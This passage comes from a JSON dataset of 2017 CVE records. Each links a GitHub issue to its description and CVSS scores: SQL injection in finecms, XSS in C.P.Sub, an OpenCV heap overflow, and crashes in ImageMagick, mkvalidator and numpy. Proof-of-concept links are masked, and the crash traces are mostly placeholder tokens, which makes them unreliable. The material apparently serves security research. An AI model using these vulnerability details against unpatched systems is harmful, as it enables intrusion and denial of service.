NUMBERTAG b in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG c8 in APITAG APITAG NUMBERTAG bb NUMBERTAG in APITAG APITAG NUMBERTAG ea0ba0 in APITAG APITAG NUMBERTAG fa NUMBERTAG d1 in APITAG APITAG NUMBERTAG e7a in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b6e NUMBERTAG a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ba ( PATHTAG ) POC: URLTAG",
  7965. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7966. "severity": "MEDIUM",
  7967. "baseScore": 6.5,
  7968. "impactScore": 3.6,
  7969. "exploitabilityScore": 2.8
  7970. },
  7971. {
  7972. "CVE_ID": "CVE-2017-12774",
  7973. "Issue_Url_old": "https://github.com/yzcrnx/finecms/issues/1",
  7974. "Issue_Url_new": "https://github.com/yzcrnx/finecms/issues/1",
  7975. "Repo_new": "yzcrnx/finecms",
  7976. "Issue_Created_At": "2017-08-09T01:04:59Z",
  7977. "description": "finecms. finecms version in NUMBERTAG in PATHTAG here has a sql injection . use function APITAG ERRORTAG POC: APITAG use APITAG to inject it ERRORTAG",
  7978. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7979. "severity": "CRITICAL",
  7980. "baseScore": 9.8,
  7981. "impactScore": 5.9,
  7982. "exploitabilityScore": 3.9
  7983. },
  7984. {
  7985. "CVE_ID": "CVE-2017-12779",
  7986. "Issue_Url_old": "https://github.com/Matroska-Org/foundation-source/issues/24",
  7987. "Issue_Url_new": "https://github.com/matroska-org/foundation-source/issues/24",
  7988. "Repo_new": "matroska-org/foundation-source",
  7989. "Issue_Created_At": "2017-08-14T02:21:00Z",
  7990. "description": "Multiple bugs NUMBERTAG the APITAG function in PATHTAG in mkvalidator NUMBERTAG can cause a denial of APITAG pointer dereference and application crash) via a crafted mkv file. ./mkvalidator APITAG debug info: Program received signal SIGSEGV, Segmentation fault NUMBERTAG in APITAG (p NUMBERTAG Id NUMBERTAG Type NUMBERTAG at PATHTAG NUMBERTAG for (i=p APITAG APITAG (gdb) bt NUMBERTAG in APITAG (p NUMBERTAG Id NUMBERTAG Type NUMBERTAG at PATHTAG NUMBERTAG cb NUMBERTAG in APITAG APITAG at APITAG NUMBERTAG cf NUMBERTAG in APITAG APITAG at APITAG NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffdf NUMBERTAG at APITAG (gdb) disassemble Dump of assembler code for function APITAG NUMBERTAG APITAG : push %rbp NUMBERTAG APITAG : mov %rsp,%rbp NUMBERTAG APITAG : mov %rdi NUMBERTAG rbp NUMBERTAG b APITAG : mov %rsi NUMBERTAG rbp NUMBERTAG f APITAG : mov %rd NUMBERTAG rbp NUMBERTAG APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG APITAG : shl NUMBERTAG ra NUMBERTAG b APITAG : or NUMBERTAG rbp),%ra NUMBERTAG f APITAG : mov %ra NUMBERTAG rbp NUMBERTAG APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG APITAG : mo NUMBERTAG rax),%ra NUMBERTAG b APITAG : mov %ra NUMBERTAG rbp NUMBERTAG f APITAG : jmp NUMBERTAG APITAG NUMBERTAG APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG APITAG : mo NUMBERTAG rax),%ra NUMBERTAG APITAG : cmp NUMBERTAG rbp),%ra NUMBERTAG d APITAG : jne NUMBERTAG APITAG NUMBERTAG f APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG APITAG : add NUMBERTAG ra NUMBERTAG APITAG : jmp NUMBERTAG a0 APITAG NUMBERTAG APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG d APITAG : mov (%rax),%rax Type APITAG to continue, or q APITAG to quit q Quit (gdb) i r ra NUMBERTAG rb NUMBERTAG rc NUMBERTAG ffff7b NUMBERTAG rd NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG fffffffb NUMBERTAG fffffffb NUMBERTAG rsp NUMBERTAG fffffffb NUMBERTAG fffffffb NUMBERTAG r NUMBERTAG e NUMBERTAG r NUMBERTAG fffffffb NUMBERTAG r NUMBERTAG fffffffffffffa NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG fffffffdf NUMBERTAG r NUMBERTAG r NUMBERTAG rip NUMBERTAG APITAG eflags NUMBERTAG FILETAG",
  7991. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7992. "severity": "MEDIUM",
  7993. "baseScore": 6.5,
  7994. "impactScore": 3.6,
  7995. "exploitabilityScore": 2.8
  7996. },
  7997. {
  7998. "CVE_ID": "CVE-2017-12804",
  7999. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/30",
  8000. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/30",
  8001. "Repo_new": "jsummers/imageworsener",
  8002. "Issue_Created_At": "2017-08-06T06:01:53Z",
  8003. "description": "memory exhausted in iwgif_init_screen . PATHTAG imagew oom iwgif_init_screen1 imout/out outfmt png oom iwgif_init_screen1 \u2192 imout/out NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG eb NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5b NUMBERTAG b5c NUMBERTAG b5d NUMBERTAG b5d8f NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b6f3f NUMBERTAG PATHTAG NUMBERTAG b6f3f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b6f5f NUMBERTAG PATHTAG NUMBERTAG b6f5f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG fc NUMBERTAG b NUMBERTAG fd NUMBERTAG b NUMBERTAG ff NUMBERTAG b NUMBERTAG ff NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG bfcd NUMBERTAG bfcf NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG a4c1 ( PATHTAG NUMBERTAG b NUMBERTAG e6a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a in __interceptor_malloc ( PATHTAG NUMBERTAG in iw_malloc_ex src/imagew APITAG NUMBERTAG in iw_malloc_large src/imagew APITAG NUMBERTAG dee NUMBERTAG in iwgif_init_screen src/imagew APITAG NUMBERTAG dee NUMBERTAG in iwgif_read_image src/imagew APITAG NUMBERTAG e NUMBERTAG c4 in iwgif_read_main src/imagew APITAG NUMBERTAG e NUMBERTAG c4 in iw_read_gif_file src/imagew APITAG NUMBERTAG ad in iwcmd_run src/imagew APITAG NUMBERTAG b0 in iwcmd_main src/imagew APITAG NUMBERTAG a NUMBERTAG a in main src/imagew APITAG NUMBERTAG b6f7ca NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ae2f ( PATHTAG ) POC URLTAG",
  8004. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8005. "severity": "MEDIUM",
  8006. "baseScore": 6.5,
  8007. "impactScore": 3.6,
  8008. "exploitabilityScore": 2.8
  8009. },
  8010. {
  8011. "CVE_ID": "CVE-2017-12805",
  8012. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/664",
  8013. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/664",
  8014. "Repo_new": "imagemagick/imagemagick",
  8015. "Issue_Created_At": "2017-08-10T05:00:53Z",
  8016. "description": "memory exhaustion in APITAG PATHTAG convert oom APITAG /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG ffff NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b2a NUMBERTAG b2b NUMBERTAG b2c NUMBERTAG b2d NUMBERTAG b2e NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5ae NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c6a NUMBERTAG b5c6a NUMBERTAG b5c6b NUMBERTAG PATHTAG NUMBERTAG b5c6b NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e4a NUMBERTAG PATHTAG NUMBERTAG b6e4a NUMBERTAG b6e4b NUMBERTAG PATHTAG NUMBERTAG b6e4b NUMBERTAG b6e4c NUMBERTAG PATHTAG NUMBERTAG b6e4c NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ffb NUMBERTAG b6ffb NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG aa NUMBERTAG b NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG bfd8c NUMBERTAG bfdad NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG f NUMBERTAG c1 ( PATHTAG NUMBERTAG b NUMBERTAG fd6a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bd NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG be NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG a in __interceptor_malloc ( PATHTAG NUMBERTAG baef7a in APITAG APITAG NUMBERTAG baef7a in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG baf5e in APITAG APITAG NUMBERTAG bea NUMBERTAG in APITAG APITAG NUMBERTAG ec NUMBERTAG d8 in APITAG APITAG NUMBERTAG fc9e NUMBERTAG in APITAG APITAG NUMBERTAG d9a in APITAG APITAG NUMBERTAG ca in main APITAG NUMBERTAG b6e NUMBERTAG a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG a ( PATHTAG ) POC URLTAG",
  8017. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  8018. "severity": "HIGH",
  8019. "baseScore": 7.5,
  8020. "impactScore": 3.6,
  8021. "exploitabilityScore": 3.9
  8022. },
  8023. {
  8024. "CVE_ID": "CVE-2017-12806",
  8025. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/660",
  8026. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/660",
  8027. "Repo_new": "imagemagick/imagemagick",
  8028. "Issue_Created_At": "2017-08-08T03:28:18Z",
  8029. "description": "memory exhaustion in format8BIM. PATHTAG convert oom format8BIM /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG e8d NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG a NUMBERTAG ffff NUMBERTAG b1f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b2a NUMBERTAG b2b NUMBERTAG b2c NUMBERTAG b2d NUMBERTAG b2e NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5abb NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG PATHTAG NUMBERTAG b5c NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG b6e2b NUMBERTAG PATHTAG NUMBERTAG b6e2b NUMBERTAG b6e2c NUMBERTAG PATHTAG NUMBERTAG b6e2c NUMBERTAG b6e2d NUMBERTAG PATHTAG NUMBERTAG b6e2d NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6fdb NUMBERTAG PATHTAG NUMBERTAG b6fdb NUMBERTAG b6fdd NUMBERTAG PATHTAG NUMBERTAG b6fdd NUMBERTAG b6fde NUMBERTAG PATHTAG NUMBERTAG b6fde NUMBERTAG b6fe NUMBERTAG b6fe NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ffa NUMBERTAG PATHTAG NUMBERTAG b6ffa NUMBERTAG b6ffb NUMBERTAG PATHTAG NUMBERTAG b6ffb NUMBERTAG b6ffd NUMBERTAG b6ffd NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG aa NUMBERTAG b NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG dso NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG bd NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bd NUMBERTAG b NUMBERTAG be NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG be NUMBERTAG b NUMBERTAG bf NUMBERTAG PATHTAG NUMBERTAG bfa NUMBERTAG bfa7a NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG df4c1 ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e8e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG a in __interceptor_malloc ( PATHTAG NUMBERTAG de NUMBERTAG c in format8BIM APITAG NUMBERTAG e NUMBERTAG c in APITAG APITAG NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG c NUMBERTAG a in APITAG APITAG NUMBERTAG ed NUMBERTAG c in APITAG APITAG NUMBERTAG fd NUMBERTAG in APITAG APITAG NUMBERTAG f2 in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b6e4ba NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG c5a ( PATHTAG ) POC URLTAG",
  8030. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  8031. "severity": "HIGH",
  8032. "baseScore": 7.5,
  8033. "impactScore": 3.6,
  8034. "exploitabilityScore": 3.9
  8035. },
  8036. {
  8037. "CVE_ID": "CVE-2017-12847",
  8038. "Issue_Url_old": "https://github.com/NagiosEnterprises/nagioscore/issues/404",
  8039. "Issue_Url_new": "https://github.com/nagiosenterprises/nagioscore/issues/404",
  8040. "Repo_new": "nagiosenterprises/nagioscore",
  8041. "Issue_Created_At": "2017-07-28T20:39:10Z",
  8042. "description": "nagios daemon should create its PID file before dropping privileges. Summary The nagios daemon should create its PID file before dropping privileges. This represents a minor security issue; additional factors are needed to make it exploitable. Description The purpose of the PID file is to hold the PID of the running daemon, so that later it can be stopped, restarted, or otherwise signalled (many daemons reload their configurations in response to a SIGHUP). To fulfill that purpose, the contents of the PID file need to be trustworthy. If the PID file is writable by a non root user, then he can replace its contents with the PID of a root process. Afterwards, any attempt to signal the PID contained in the PID file will instead signal a root process chosen by the non root user (a vulnerability). This is commonly exploitable by init scripts that are run as root and which blindly trust the contents of their PID files. If one daemon flushes its cache in response to SIGUSR2 and another daemon drops all connections in response to SIGUSR2, it is not hard to imagine a denial of service by the user of the first daemon against the second. Exploitation There is only a risk of exploitation when some other user relies on the data in the PID file. But you have to wonder, what's the point of the PID file if not to provide the PID to other people? Any situation where the PID file is used is therefore suspicious. The init script APITAG that ships with nagios itself relies on the PID file to e.g. reload the nagios configuration.",
  8043. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
  8044. "severity": "MEDIUM",
  8045. "baseScore": 6.3,
  8046. "impactScore": 5.2,
  8047. "exploitabilityScore": 1.0
  8048. },
  8049. {
  8050. "CVE_ID": "CVE-2017-12852",
  8051. "Issue_Url_old": "https://github.com/numpy/numpy/issues/9560",
  8052. "Issue_Url_new": "https://github.com/numpy/numpy/issues/9560",
  8053. "Repo_new": "numpy/numpy",
  8054. "Issue_Created_At": "2017-08-15T03:02:02Z",
  8055. "description": "missing input validation . When I test librosa library for speech recognition, I found a bug in APITAG and APITAG function which used numpy.pad function. In my test, it will stick into infinite loop ,once accepted a empty list or ndarray, the numpy.pad function will stick into infinite loop. Although the comment says that the function need a rank NUMBERTAG array, but I think it still need to check the input array to avoid the above problem. Look forward to your reply!",
  8056. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  8057. "severity": "HIGH",
  8058. "baseScore": 7.5,
  8059. "impactScore": 3.6,
  8060. "exploitabilityScore": 3.9
  8061. },
  8062. {
  8063. "CVE_ID": "CVE-2017-12856",
  8064. "Issue_Url_old": "https://github.com/cooltey/C.P.Sub/issues/2",
  8065. "Issue_Url_new": "https://github.com/cooltey/c.p.sub/issues/2",
  8066. "Repo_new": "cooltey/c.p.sub",
  8067. "Issue_Created_At": "2017-05-07T02:02:06Z",
  8068. "description": "Cross site Scripting (XSS). parameter value without rigorous filtration FILETAG Poc Payload\uff1a URLTAG Vesrion NUMBERTAG FILETAG keyword does not check the output and input points, resulting in code triggering FILETAG Resolving: Filtering encoding or escaping",
  8069. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  8070. "severity": "MEDIUM",
  8071. "baseScore": 6.1,
  8072. "impactScore": 2.7,
  8073. "exploitabilityScore": 2.8
  8074. },
  8075. {
  8076. "CVE_ID": "CVE-2017-12862",
  8077. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9370",
  8078. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9370",
  8079. "Repo_new": "opencv/opencv",
  8080. "Issue_Created_At": "2017-08-15T06:14:56Z",
  8081. "description": "APITAG in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => g++ > Detailed description APITAG trigger the heap buffer overflow APITAG version from NUMBERTAG to NUMBERTAG affected Root cause: in PATHTAG NUMBERTAG int bit_depth = CV_ELEM_SIZE1(m_type NUMBERTAG int src_pitch = (m_width m_bpp bit_depth NUMBERTAG APITAG _src(src_pitch NUMBERTAG uchar src = _src NUMBERTAG for NUMBERTAG m_width; x++ ) src[x] = APITAG m_strm NUMBERTAG In my poc, the m_width is about NUMBERTAG bigger than src_pitch, which cause the \\_src buffer overflowed (gdb) p src_pitch NUMBERTAG a2c3 (gdb) p m_width NUMBERTAG gdb) p m_bpp NUMBERTAG gdb) p bit_depth NUMBERTAG Steps to reproduce APITAG poc is here: URLTAG",
  8082. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8083. "severity": "HIGH",
  8084. "baseScore": 8.8,
  8085. "impactScore": 5.9,
